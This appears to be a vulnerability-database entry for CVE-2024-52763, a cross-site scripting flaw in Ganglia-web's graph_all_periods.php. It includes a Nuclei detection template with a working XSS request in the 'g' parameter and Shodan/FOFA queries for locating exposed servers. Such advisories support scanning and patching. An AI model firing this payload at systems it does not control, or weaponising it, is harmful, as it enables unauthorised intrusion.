CVE-2024-52763: Ganglia Web Interface (v3.7.3 - v3.7.5) - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Ganglia Web Interface | POC: 已公开

漏洞描述

A cross-site scripting (XSS) vulnerability in the component /graph_all_periods.php of Ganglia-web v3.73 to v3.75 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the "g" parameter.

PoC代码[已公开]

id: CVE-2024-52763

info:
  name: Ganglia Web Interface (v3.7.3 - v3.7.5) - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    A cross-site scripting (XSS) vulnerability in the component /graph_all_periods.php of Ganglia-web v3.73 to v3.75 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the "g" parameter.
  reference:
    - https://github.com/ganglia/ganglia-web/issues/382
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2024-52763
    cwe-id: CWE-79
    epss-score: 0.00262
    epss-percentile: 0.49521
    cpe: cpe:2.3:a:ganglia:ganglia-web:*:*:*:*:*:*:*:*
  metadata:
    vendor: ganglia
    product: ganglia-web
    shodan-query: http.html:"ganglia_form.submit()"
    fofa-query: body="ganglia_form.submit()"
  tags: cve,cve2024,xss,ganglia,vkev

http:
  - raw:
      - |
        GET /ganglia/graph_all_periods.php?g=%22%22%20autofocus%20onfocus=alert(document.domain)//%22 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"" autofocus onfocus=alert(document.domain)//"'
          - 'metricActions'
        condition: and

      - type: word
        part: content_type
        words:
          - "text/html"
# digest: 4b0a00483046022100d331da8d0047af74089cb0c081b2c29bc395bf9c2b1db0e1403594165fea0dc8022100bbc53f861f01d7aa56fba171c127701fc454eea7753f62d04b6195319453345c:922c64590222798bb761d5b6d8e72950

相关漏洞推荐